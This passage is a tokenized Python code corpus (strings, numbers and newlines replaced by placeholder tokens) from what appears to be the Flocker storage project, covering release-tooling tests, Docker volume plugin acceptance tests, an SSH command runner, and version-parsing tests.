. scratch_directory . 
makedirs ( ) <EOL> def test_index_created ( self ) : <EOL> """<STR_LIT>""" <EOL> index = create_pip_index ( <EOL> scratch_directory = self . scratch_directory , <EOL> packages = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) <EOL> expected = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( expected , index . getContent ( ) ) <EOL> def test_index_not_included ( self ) : <EOL> """<STR_LIT>""" <EOL> index = create_pip_index ( <EOL> scratch_directory = self . scratch_directory , <EOL> packages = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> expected = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( expected , index . getContent ( ) ) <EOL> def test_quoted_destination ( self ) : <EOL> """<STR_LIT>""" <EOL> index = create_pip_index ( <EOL> scratch_directory = self . scratch_directory , <EOL> packages = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> expected = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( expected , index . getContent ( ) ) <EOL> def test_escaped_title ( self ) : <EOL> """<STR_LIT>""" <EOL> index = create_pip_index ( <EOL> scratch_directory = self . scratch_directory , <EOL> packages = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> expected = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( expected , index . getContent ( ) ) <EOL> class UploadPipIndexTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_index_uploaded ( self ) : <EOL> """<STR_LIT>""" <EOL> bucket = '<STR_LIT>' <EOL> aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> bucket : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> scratch_directory = FilePath ( self . mktemp ( ) ) <EOL> scratch_directory . makedirs ( ) <EOL> sync_perform ( <EOL> ComposedDispatcher ( [ aws . 
get_dispatcher ( ) , base_dispatcher ] ) , <EOL> upload_pip_index ( <EOL> scratch_directory = scratch_directory , <EOL> target_bucket = bucket ) ) <EOL> self . assertEqual ( <EOL> aws . s3_buckets [ bucket ] [ '<STR_LIT>' ] , <EOL> ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) ) <EOL> class CalculateBaseBranchTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( CalculateBaseBranchTests , self ) . setUp ( ) <EOL> self . repo = create_git_repository ( test_case = self ) <EOL> def calculate_base_branch ( self , version ) : <EOL> return calculate_base_branch ( <EOL> version = version , path = self . repo . working_dir ) <EOL> def test_calculate_base_branch_for_non_release_fails ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> NotARelease , <EOL> self . calculate_base_branch , '<STR_LIT>' ) <EOL> def test_weekly_release_base ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> self . calculate_base_branch ( version = '<STR_LIT>' ) . name , <EOL> "<STR_LIT>" ) <EOL> def test_first_pre_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> self . calculate_base_branch ( version = '<STR_LIT>' ) . name , <EOL> "<STR_LIT>" ) <EOL> def test_unparseable_tags ( self ) : <EOL> """<STR_LIT>""" <EOL> self . repo . create_head ( '<STR_LIT>' ) <EOL> self . repo . create_tag ( '<STR_LIT>' ) <EOL> self . repo . create_head ( '<STR_LIT>' ) <EOL> self . repo . create_tag ( '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> self . calculate_base_branch ( version = '<STR_LIT>' ) . name , <EOL> "<STR_LIT>" ) <EOL> def test_parent_repository_used ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> calculate_base_branch ( <EOL> version = '<STR_LIT>' , <EOL> path = FilePath ( self . repo . working_dir ) . child ( '<STR_LIT>' ) . path , <EOL> ) . name , <EOL> "<STR_LIT>" ) <EOL> def test_tag_exists_fails ( self ) : <EOL> """<STR_LIT>""" <EOL> self . repo . 
create_tag ( '<STR_LIT>' ) <EOL> self . assertRaises ( <EOL> TagExists , <EOL> self . calculate_base_branch , '<STR_LIT>' ) <EOL> def test_branch_only_exists_remote ( self ) : <EOL> """<STR_LIT>""" <EOL> self . repo . create_head ( '<STR_LIT>' ) <EOL> self . repo . create_tag ( '<STR_LIT>' ) <EOL> directory = FilePath ( self . mktemp ( ) ) <EOL> clone = self . repo . clone ( path = directory . path ) <EOL> self . assertEqual ( <EOL> calculate_base_branch ( <EOL> version = '<STR_LIT>' , <EOL> path = clone . working_dir ) . name , <EOL> "<STR_LIT>" ) <EOL> class UpdateLicenseFileTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_update_license_file ( self ) : <EOL> """<STR_LIT>""" <EOL> top_level = FilePath ( self . mktemp ( ) ) <EOL> top_level . child ( '<STR_LIT>' ) . makedirs ( ) <EOL> top_level . child ( '<STR_LIT>' ) . child ( '<STR_LIT>' ) . setContent ( <EOL> "<STR_LIT>" ) <EOL> update_license_file ( args = [ ] , top_level = top_level , year = <NUM_LIT> ) <EOL> self . assertEqual ( <EOL> top_level . child ( '<STR_LIT>' ) . getContent ( ) , <EOL> "<STR_LIT>" <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from . no_load import NoLoadScenario <EOL> from . read_request_load import read_request_load_scenario <EOL> from . write_request_load import ( <EOL> write_request_load_scenario , DatasetCreationTimeout , <EOL> ) <EOL> from . _request_load import ( <EOL> RequestRateTooLow , RequestRateNotReached , RequestOverload , NoNodesFound , <EOL> RequestScenarioAlreadyStarted , <EOL> ) <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> from distutils . version import LooseVersion <EOL> from twisted . internet import reactor <EOL> from twisted . internet . defer import gatherResults <EOL> from hypothesis . strategies import integers <EOL> from bitmath import GiB <EOL> from eliot import Message <EOL> from ... common import loop_until <EOL> from ... common . runner import run_ssh <EOL> from ... dockerplugin . test . test_api import volume_expression <EOL> from ... testtools import AsyncTestCase , random_name , flaky , async_runner <EOL> from . . testtools import ( <EOL> require_cluster , post_http_server , assert_http_server , <EOL> get_docker_client , verify_socket , check_http_server , <EOL> extract_external_port , <EOL> create_dataset , require_moving_backend , ACCEPTANCE_TEST_TIMEOUT <EOL> ) <EOL> from . . scripts import SCRIPTS <EOL> from ... node import backends <EOL> from ... node . agents . ebs import EBSMandatoryProfileAttributes <EOL> class DockerPluginTests ( AsyncTestCase ) : <EOL> """<STR_LIT>""" <EOL> run_tests_with = async_runner ( timeout = ACCEPTANCE_TEST_TIMEOUT ) <EOL> def require_docker ( self , required_version , cluster ) : <EOL> """<STR_LIT>""" <EOL> client = get_docker_client ( cluster , cluster . nodes [ <NUM_LIT:0> ] . public_address ) <EOL> client_version = LooseVersion ( client . version ( ) [ '<STR_LIT>' ] ) <EOL> minimum_version = LooseVersion ( required_version ) <EOL> if client_version < minimum_version : <EOL> self . skipTest ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( minimum_version , client_version ) <EOL> ) <EOL> def docker_service ( self , address , action ) : <EOL> """<STR_LIT>""" <EOL> distro = [ ] <EOL> get_distro = run_ssh ( <EOL> reactor , b"<STR_LIT:root>" , address , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> handle_stdout = distro . append ) <EOL> get_distro . addCallback ( lambda _ : distro [ <NUM_LIT:0> ] . 
lower ( ) ) <EOL> def action_docker ( distribution ) : <EOL> if '<STR_LIT>' in distribution : <EOL> command = [ "<STR_LIT>" , "<STR_LIT>" , action ] <EOL> else : <EOL> command = [ "<STR_LIT>" , action , "<STR_LIT>" ] <EOL> d = run_ssh ( reactor , b"<STR_LIT:root>" , address , command ) <EOL> def handle_error ( _ , action ) : <EOL> self . fail ( <EOL> "<STR_LIT>" . format ( <EOL> action ) ) <EOL> d . addErrback ( handle_error , action ) <EOL> return d <EOL> acting = get_distro . addCallback ( action_docker ) <EOL> return acting <EOL> def run_python_container ( self , cluster , address , docker_arguments , script , <EOL> script_arguments , cleanup = True , client = None ) : <EOL> """<STR_LIT>""" <EOL> if client is None : <EOL> client = get_docker_client ( cluster , address ) <EOL> for container in client . containers ( ) : <EOL> client . remove_container ( container [ "<STR_LIT>" ] , force = True ) <EOL> container = client . create_container ( <EOL> "<STR_LIT>" , <EOL> [ "<STR_LIT>" , "<STR_LIT:-c>" , script . getContent ( ) ] + list ( script_arguments ) , <EOL> volume_driver = "<STR_LIT>" , ** docker_arguments ) <EOL> cid = container [ "<STR_LIT>" ] <EOL> client . start ( container = cid ) <EOL> if cleanup : <EOL> self . addCleanup ( client . remove_container , cid , force = True ) <EOL> return cid <EOL> def _create_volume ( self , client , name , driver_opts ) : <EOL> """<STR_LIT>""" <EOL> result = client . create_volume ( name , u'<STR_LIT>' , driver_opts ) <EOL> self . addCleanup ( client . remove_volume , name ) <EOL> return result <EOL> def _test_sized_vol_container ( self , cluster , node ) : <EOL> """<STR_LIT>""" <EOL> client = get_docker_client ( cluster , node . public_address ) <EOL> volume_name = random_name ( self ) <EOL> size = integers ( min_value = <NUM_LIT> , max_value = <NUM_LIT:100> ) . example ( ) <EOL> expression = volume_expression . example ( ) <EOL> size_opt = "<STR_LIT>" . 
join ( str ( size ) ) + expression <EOL> size_bytes = int ( GiB ( size ) . to_Byte ( ) . value ) <EOL> self . _create_volume ( client , volume_name , <EOL> driver_opts = { '<STR_LIT:size>' : size_opt } ) <EOL> http_port = <NUM_LIT> <EOL> container_identifier = self . run_python_container ( <EOL> cluster , node . public_address , <EOL> { "<STR_LIT>" : client . create_host_config ( <EOL> binds = [ "<STR_LIT>" . format ( volume_name ) ] , <EOL> port_bindings = { http_port : <NUM_LIT:0> } , <EOL> restart_policy = { "<STR_LIT:Name>" : "<STR_LIT>" } , <EOL> privileged = True ) , <EOL> "<STR_LIT>" : [ http_port ] } , <EOL> SCRIPTS . child ( b"<STR_LIT>" ) , <EOL> [ u"<STR_LIT>" ] , client = client ) <EOL> host_port = extract_external_port ( <EOL> client , container_identifier , http_port , <EOL> ) <EOL> d = assert_http_server ( <EOL> self , node . public_address , host_port , <EOL> expected_response = str ( size_bytes ) ) <EOL> def _get_datasets ( unused_arg ) : <EOL> return cluster . client . list_datasets_configuration ( ) <EOL> d . addCallback ( _get_datasets ) <EOL> def _verify_volume_metadata_size ( datasets ) : <EOL> dataset = next ( d for d in datasets <EOL> if d . metadata . get ( u'<STR_LIT:name>' ) == volume_name ) <EOL> self . assertEqual ( int ( dataset . metadata . get ( u'<STR_LIT>' ) ) , <EOL> size_bytes ) <EOL> d . addCallback ( _verify_volume_metadata_size ) <EOL> return d <EOL> @ require_cluster ( <NUM_LIT:1> ) <EOL> def test_create_sized_volume_with_v2_plugin_api ( self , cluster ) : <EOL> """<STR_LIT>""" <EOL> self . require_docker ( '<STR_LIT>' , cluster ) <EOL> return self . _test_sized_vol_container ( cluster , cluster . nodes [ <NUM_LIT:0> ] ) <EOL> def _test_create_container ( self , cluster , volume_name = None ) : <EOL> """<STR_LIT>""" <EOL> data = random_name ( self ) . encode ( "<STR_LIT:utf-8>" ) <EOL> node = cluster . nodes [ <NUM_LIT:0> ] <EOL> client = get_docker_client ( cluster , node . 
public_address ) <EOL> http_port = <NUM_LIT> <EOL> if volume_name is None : <EOL> volume_name = random_name ( self ) <EOL> container_identifier = self . run_python_container ( <EOL> cluster , node . public_address , <EOL> { "<STR_LIT>" : client . create_host_config ( <EOL> binds = [ "<STR_LIT>" . format ( volume_name ) ] , <EOL> port_bindings = { http_port : <NUM_LIT:0> } , <EOL> restart_policy = { "<STR_LIT:Name>" : "<STR_LIT>" } ) , <EOL> "<STR_LIT>" : [ http_port ] } , <EOL> SCRIPTS . child ( b"<STR_LIT>" ) , <EOL> [ u"<STR_LIT>" ] , client = client ) <EOL> host_port = extract_external_port ( <EOL> client , container_identifier , http_port <EOL> ) <EOL> d = post_http_server ( self , node . public_address , host_port , <EOL> { "<STR_LIT:data>" : data } ) <EOL> d . addCallback ( lambda _ : assert_http_server ( <EOL> self , node . public_address , host_port , expected_response = data ) ) <EOL> return d <EOL> @ flaky ( u'<STR_LIT>' ) <EOL> @ require_cluster ( <NUM_LIT:1> ) <EOL> def test_create_container_with_v2_plugin_api ( self , cluster ) : <EOL> """<STR_LIT>""" <EOL> self . require_docker ( '<STR_LIT>' , cluster ) <EOL> return self . _test_create_container ( cluster ) <EOL> @ require_cluster ( <NUM_LIT:1> , required_backend = backends . AWS ) <EOL> def test_create_silver_volume_with_v2_plugin_api ( self , cluster , backend ) : <EOL> """<STR_LIT>""" <EOL> self . require_docker ( '<STR_LIT>' , cluster ) <EOL> node = cluster . nodes [ <NUM_LIT:0> ] <EOL> docker = get_docker_client ( cluster , node . public_address ) <EOL> volume_name = random_name ( self ) <EOL> self . _create_volume ( docker , volume_name , <EOL> driver_opts = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> create_container = self . _test_create_container ( cluster , <EOL> volume_name = volume_name ) <EOL> def _get_datasets ( unused_arg ) : <EOL> return cluster . client . list_datasets_configuration ( ) <EOL> create_container . 
addCallback ( _get_datasets ) <EOL> def _verify_created_volume_is_silver ( datasets ) : <EOL> dataset = next ( d for d in datasets <EOL> if d . metadata . get ( u'<STR_LIT:name>' ) == volume_name ) <EOL> volumes = backend . list_volumes ( ) <EOL> volume = next ( v for v in volumes <EOL> if v . dataset_id == dataset . dataset_id ) <EOL> ebs_volume = backend . _get_ebs_volume ( volume . blockdevice_id ) <EOL> self . assertEqual ( <EOL> EBSMandatoryProfileAttributes . SILVER . value . volume_type . value , <EOL> ebs_volume . volume_type ) <EOL> create_container . addCallback ( _verify_created_volume_is_silver ) <EOL> return create_container <EOL> @ require_cluster ( <NUM_LIT:1> ) <EOL> def test_volume_persists_restart ( self , cluster ) : <EOL> """<STR_LIT>""" <EOL> data = random_name ( self ) . encode ( "<STR_LIT:utf-8>" ) <EOL> node = cluster . nodes [ <NUM_LIT:0> ] <EOL> Message . new ( <EOL> message_type = u"<STR_LIT>" , <EOL> node = node . public_address , <EOL> ) . write ( ) <EOL> client = get_docker_client ( cluster , node . public_address ) <EOL> http_port = <NUM_LIT> <EOL> volume_name = random_name ( self ) <EOL> container_identifier = self . run_python_container ( <EOL> cluster , node . public_address , <EOL> { "<STR_LIT>" : client . create_host_config ( <EOL> binds = [ "<STR_LIT>" . format ( volume_name ) ] , <EOL> port_bindings = { http_port : <NUM_LIT:0> } , <EOL> restart_policy = { "<STR_LIT:Name>" : "<STR_LIT>" } ) , <EOL> "<STR_LIT>" : [ http_port ] } , <EOL> SCRIPTS . child ( b"<STR_LIT>" ) , <EOL> [ u"<STR_LIT>" ] , client = client ) <EOL> host_port = extract_external_port ( <EOL> client , container_identifier , http_port <EOL> ) <EOL> d = post_http_server ( self , node . public_address , host_port , <EOL> { "<STR_LIT:data>" : data } ) <EOL> d . addCallback ( lambda _ : assert_http_server ( <EOL> self , node . public_address , host_port , expected_response = data ) ) <EOL> d . addCallback ( lambda _ : self . docker_service ( <EOL> node . 
public_address , b"<STR_LIT>" ) ) <EOL> def poll_http_server_stopped ( _ ) : <EOL> def http_closed ( ) : <EOL> ds = check_http_server ( node . public_address , host_port ) <EOL> ds . addCallback ( lambda succeeded : not succeeded ) <EOL> return ds <EOL> looping = loop_until ( reactor , http_closed ) <EOL> return looping <EOL> d . addCallback ( poll_http_server_stopped ) <EOL> d . addCallback ( lambda _ : self . docker_service ( <EOL> node . public_address , b"<STR_LIT:start>" ) ) <EOL> d . addCallback ( lambda _ : extract_external_port ( <EOL> client , container_identifier , http_port , <EOL> ) ) <EOL> def poll_http_server ( host_port ) : <EOL> ds = verify_socket ( node . public_address , host_port ) <EOL> ds . addCallback ( lambda _ : assert_http_server ( <EOL> self , node . public_address , host_port , expected_response = data ) <EOL> ) <EOL> return ds <EOL> d . addCallback ( poll_http_server ) <EOL> return d <EOL> @ require_cluster ( <NUM_LIT:1> ) <EOL> def test_run_container_with_volume ( self , cluster ) : <EOL> """<STR_LIT>""" <EOL> return self . _test_create_container ( cluster ) <EOL> @ require_cluster ( <NUM_LIT:1> ) <EOL> def test_run_container_with_preexisting_volume ( self , cluster ) : <EOL> """<STR_LIT>""" <EOL> name = random_name ( self ) <EOL> d = create_dataset ( self , cluster , metadata = { u"<STR_LIT:name>" : name } ) <EOL> d . addCallback ( lambda _ : self . _test_create_container ( <EOL> cluster , volume_name = name ) ) <EOL> return d <EOL> def _test_move ( self , cluster , origin_node , destination_node ) : <EOL> """<STR_LIT>""" <EOL> origin_client = get_docker_client ( cluster , origin_node . public_address ) <EOL> data = "<STR_LIT>" <EOL> http_port = <NUM_LIT> <EOL> volume_name = random_name ( self ) <EOL> container_args = { <EOL> "<STR_LIT>" : origin_client . create_host_config ( <EOL> binds = [ "<STR_LIT>" . 
format ( volume_name ) ] , <EOL> port_bindings = { http_port : <NUM_LIT:0> } ) , <EOL> "<STR_LIT>" : [ http_port ] } <EOL> cid = self . run_python_container ( <EOL> cluster , origin_node . public_address , container_args , <EOL> SCRIPTS . child ( b"<STR_LIT>" ) , <EOL> [ u"<STR_LIT>" ] , cleanup = False , client = origin_client ) <EOL> host_port = extract_external_port ( origin_client , cid , http_port ) <EOL> d = post_http_server ( self , origin_node . public_address , host_port , <EOL> { "<STR_LIT:data>" : data } ) <EOL> def posted ( _ ) : <EOL> origin_client . remove_container ( cid , force = True ) <EOL> new_cid = self . run_python_container ( <EOL> cluster , destination_node . public_address , container_args , <EOL> SCRIPTS . child ( b"<STR_LIT>" ) , [ u"<STR_LIT>" ] , <EOL> ) <EOL> destination_client = get_docker_client ( <EOL> cluster , destination_node . public_address , <EOL> ) <EOL> host_port = extract_external_port ( <EOL> destination_client , new_cid , http_port , <EOL> ) <EOL> return host_port <EOL> d . addCallback ( posted ) <EOL> d . addCallback ( <EOL> lambda host_port : assert_http_server ( <EOL> self , destination_node . public_address , host_port , <EOL> expected_response = data , <EOL> ) <EOL> ) <EOL> return d <EOL> @ flaky ( u'<STR_LIT>' ) <EOL> @ require_cluster ( <NUM_LIT:1> ) <EOL> def test_move_volume_single_node ( self , cluster ) : <EOL> """<STR_LIT>""" <EOL> return self . _test_move ( cluster , cluster . nodes [ <NUM_LIT:0> ] , cluster . nodes [ <NUM_LIT:0> ] ) <EOL> @ require_moving_backend <EOL> @ flaky ( u'<STR_LIT>' ) <EOL> @ require_cluster ( <NUM_LIT:2> ) <EOL> def test_move_volume_different_node ( self , cluster ) : <EOL> """<STR_LIT>""" <EOL> return self . _test_move ( cluster , cluster . nodes [ <NUM_LIT:0> ] , cluster . nodes [ <NUM_LIT:1> ] ) <EOL> @ require_cluster ( <NUM_LIT:1> ) <EOL> def test_inspect ( self , cluster ) : <EOL> """<STR_LIT>""" <EOL> self . 
require_docker ( '<STR_LIT>' , cluster ) <EOL> name = random_name ( self ) <EOL> d = create_dataset ( self , cluster , metadata = { u"<STR_LIT:name>" : name } ) <EOL> def created ( _ ) : <EOL> client = get_docker_client ( <EOL> cluster , cluster . nodes [ <NUM_LIT:0> ] . public_address ) <EOL> info = client . inspect_volume ( name ) <EOL> self . assertEqual ( ( info [ u"<STR_LIT>" ] , info [ u"<STR_LIT:Name>" ] ) , <EOL> ( u"<STR_LIT>" , name ) ) <EOL> d . addCallback ( created ) <EOL> return d <EOL> @ require_cluster ( <NUM_LIT:1> ) <EOL> def test_listed ( self , cluster ) : <EOL> """<STR_LIT>""" <EOL> self . require_docker ( '<STR_LIT>' , cluster ) <EOL> name = random_name ( self ) <EOL> name2 = random_name ( self ) <EOL> d = gatherResults ( [ <EOL> create_dataset ( self , cluster , metadata = { u"<STR_LIT:name>" : name } ) , <EOL> create_dataset ( self , cluster , metadata = { u"<STR_LIT:name>" : name2 } ) ] ) <EOL> def created ( _ ) : <EOL> client = get_docker_client ( <EOL> cluster , cluster . nodes [ <NUM_LIT:0> ] . public_address ) <EOL> our_volumes = [ v for v in client . volumes ( ) [ u"<STR_LIT>" ] <EOL> if v [ u"<STR_LIT:Name>" ] in ( name , name2 ) ] <EOL> self . assertEqual ( [ v [ u"<STR_LIT>" ] for v in our_volumes ] , <EOL> [ u"<STR_LIT>" , u"<STR_LIT>" ] ) <EOL> self . assertItemsEqual ( <EOL> [ v [ u"<STR_LIT:Name>" ] for v in our_volumes ] , [ name , name2 ] ) <EOL> d . addCallback ( created ) <EOL> return d </s>
<s> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from subprocess import Popen , PIPE , check_output , CalledProcessError <EOL> from contextlib import contextmanager <EOL> from io import BytesIO <EOL> from threading import current_thread <EOL> from pipes import quote <EOL> from zope . interface import Interface , implementer <EOL> from characteristic import with_cmp , with_repr <EOL> class INode ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def run ( remote_command ) : <EOL> """<STR_LIT>""" <EOL> def get_output ( remote_command ) : <EOL> """<STR_LIT>""" <EOL> @ with_cmp ( [ "<STR_LIT>" ] ) <EOL> @ with_repr ( [ "<STR_LIT>" ] ) <EOL> @ implementer ( INode ) <EOL> class ProcessNode ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , initial_command_arguments , quote = lambda d : d ) : <EOL> """<STR_LIT>""" <EOL> self . initial_command_arguments = tuple ( initial_command_arguments ) <EOL> self . _quote = quote <EOL> @ contextmanager <EOL> def run ( self , remote_command ) : <EOL> process = Popen ( <EOL> self . initial_command_arguments + <EOL> tuple ( map ( self . _quote , remote_command ) ) , <EOL> stdin = PIPE ) <EOL> try : <EOL> yield process . stdin <EOL> finally : <EOL> process . stdin . close ( ) <EOL> exit_code = process . wait ( ) <EOL> if exit_code : <EOL> raise IOError ( "<STR_LIT>" , remote_command , exit_code ) <EOL> def get_output ( self , remote_command ) : <EOL> try : <EOL> return check_output ( <EOL> self . initial_command_arguments + <EOL> tuple ( map ( self . _quote , remote_command ) ) ) <EOL> except CalledProcessError as e : <EOL> raise IOError ( "<STR_LIT>" , remote_command , e . returncode , e . output ) <EOL> @ classmethod <EOL> def using_ssh ( cls , host , port , username , private_key ) : <EOL> """<STR_LIT>""" <EOL> return cls ( initial_command_arguments = ( <EOL> b"<STR_LIT>" , <EOL> b"<STR_LIT>" , <EOL> b"<STR_LIT>" , private_key . 
path , <EOL> b"<STR_LIT>" , username , <EOL> b"<STR_LIT>" , b"<STR_LIT>" , <EOL> b"<STR_LIT>" , b"<STR_LIT>" , <EOL> b"<STR_LIT>" , b"<STR_LIT>" , <EOL> b"<STR_LIT>" , b"<STR_LIT>" % ( port , ) , host ) , quote = quote ) <EOL> @ implementer ( INode ) <EOL> class FakeNode ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , outputs = ( ) ) : <EOL> """<STR_LIT>""" <EOL> self . _outputs = list ( outputs ) <EOL> @ contextmanager <EOL> def run ( self , remote_command ) : <EOL> """<STR_LIT>""" <EOL> self . thread_id = current_thread ( ) . ident <EOL> self . stdin = BytesIO ( ) <EOL> self . remote_command = remote_command <EOL> yield self . stdin <EOL> self . stdin . seek ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> def get_output ( self , remote_command ) : <EOL> """<STR_LIT>""" <EOL> self . thread_id = current_thread ( ) . ident <EOL> self . remote_command = remote_command <EOL> result = self . _outputs . pop ( <NUM_LIT:0> ) <EOL> if isinstance ( result , Exception ) : <EOL> raise result <EOL> else : <EOL> return result </s>
<s> """<STR_LIT>""" <EOL> from unittest import skipIf , skipUnless <EOL> try : <EOL> from packaging . version import Version as PEP440Version <EOL> PACKAGING_INSTALLED = True <EOL> except ImportError : <EOL> PACKAGING_INSTALLED = False <EOL> from pyrsistent import PClass , field <EOL> from . . version import ( <EOL> parse_version , FlockerVersion , <EOL> get_doc_version , get_installable_version , get_pre_release , <EOL> get_package_key_suffix , <EOL> is_pre_release , is_release , is_weekly_release , <EOL> target_release , <EOL> NotAPreRelease , UnparseableVersion , <EOL> ) <EOL> from flocker . common . version import RPMVersion , make_rpm_version <EOL> from flocker . testtools import TestCase <EOL> class MakeRpmVersionTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_good ( self ) : <EOL> """<STR_LIT>""" <EOL> expected = { <EOL> '<STR_LIT>' : RPMVersion ( version = '<STR_LIT>' , release = '<STR_LIT:1>' ) , <EOL> '<STR_LIT>' : RPMVersion ( <EOL> version = '<STR_LIT>' , release = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : RPMVersion ( version = '<STR_LIT>' , release = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : RPMVersion ( version = '<STR_LIT>' , release = '<STR_LIT:1>' ) , <EOL> '<STR_LIT>' : RPMVersion ( version = '<STR_LIT>' , release = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> RPMVersion ( version = '<STR_LIT>' , release = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : RPMVersion ( <EOL> version = '<STR_LIT>' , release = '<STR_LIT>' ) , <EOL> } <EOL> unexpected_results = [ ] <EOL> for supplied_version , expected_rpm_version in expected . items ( ) : <EOL> actual_rpm_version = make_rpm_version ( supplied_version ) <EOL> if actual_rpm_version != expected_rpm_version : <EOL> unexpected_results . append ( ( <EOL> supplied_version , <EOL> actual_rpm_version , <EOL> expected_rpm_version , <EOL> ) ) <EOL> if unexpected_results : <EOL> self . fail ( unexpected_results ) <EOL> def test_non_integer_suffix ( self ) : <EOL> """<STR_LIT>""" <EOL> self . 
assertRaises ( UnparseableVersion , make_rpm_version , '<STR_LIT>' ) <EOL> class InvalidVersionTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_invalid_Version ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( UnparseableVersion , parse_version , '<STR_LIT>' ) <EOL> class VersionCase ( PClass ) : <EOL> """<STR_LIT>""" <EOL> version = field ( bytes , mandatory = True ) <EOL> flocker_version = field ( FlockerVersion , mandatory = True ) <EOL> doc_version = field ( bytes , mandatory = True ) <EOL> installable_version = field ( bytes , mandatory = True ) <EOL> is_release = field ( bool , mandatory = True ) <EOL> is_weekly_release = field ( bool , mandatory = True ) <EOL> is_pre_release = field ( bool , mandatory = True ) <EOL> is_legacy = field ( bool , mandatory = True , initial = False ) <EOL> def build_version_test ( name , version_case ) : <EOL> """<STR_LIT>""" <EOL> class Tests ( TestCase ) : <EOL> def test_flocker_version ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> parse_version ( version_case . version ) , <EOL> version_case . flocker_version , <EOL> "<STR_LIT>" , <EOL> ) <EOL> def test_doc_version ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> get_doc_version ( version_case . version ) , <EOL> version_case . doc_version , <EOL> "<STR_LIT>" , <EOL> ) <EOL> @ skipIf ( <EOL> version_case . is_legacy , <EOL> "<STR_LIT>" ) <EOL> def test_installable_version ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> get_installable_version ( version_case . version ) , <EOL> version_case . installable_version , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , ) <EOL> def test_is_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> is_release ( version_case . version ) , <EOL> version_case . is_release , <EOL> ) <EOL> def test_is_weekly_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> is_weekly_release ( version_case . version ) , <EOL> version_case . 
is_weekly_release , <EOL> ) <EOL> def test_is_pre_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> is_pre_release ( version_case . version ) , <EOL> version_case . is_pre_release , <EOL> ) <EOL> @ skipUnless ( PACKAGING_INSTALLED , "<STR_LIT>" ) <EOL> def test_pep_440 ( self ) : <EOL> """<STR_LIT>""" <EOL> PEP440Version ( version_case . version ) <EOL> @ skipUnless ( PACKAGING_INSTALLED , "<STR_LIT>" ) <EOL> @ skipIf ( version_case . is_legacy , "<STR_LIT>" ) <EOL> def test_normalization ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> version_case . version , <EOL> str ( PEP440Version ( version_case . version ) ) , <EOL> "<STR_LIT>" , <EOL> ) <EOL> Tests . __name__ = name <EOL> return Tests <EOL> MarketingVersionTests = build_version_test ( <EOL> "<STR_LIT>" , <EOL> VersionCase ( <EOL> version = b'<STR_LIT>' , <EOL> flocker_version = FlockerVersion ( <EOL> major = b'<STR_LIT:0>' , <EOL> minor = b'<STR_LIT:3>' , <EOL> micro = b'<STR_LIT:2>' , <EOL> ) , <EOL> doc_version = b'<STR_LIT>' , <EOL> installable_version = b'<STR_LIT>' , <EOL> is_release = True , <EOL> is_weekly_release = False , <EOL> is_pre_release = False , <EOL> ) , <EOL> ) <EOL> WeeklyReleaseTests = build_version_test ( <EOL> "<STR_LIT>" , <EOL> VersionCase ( <EOL> version = b'<STR_LIT>' , <EOL> flocker_version = FlockerVersion ( <EOL> major = 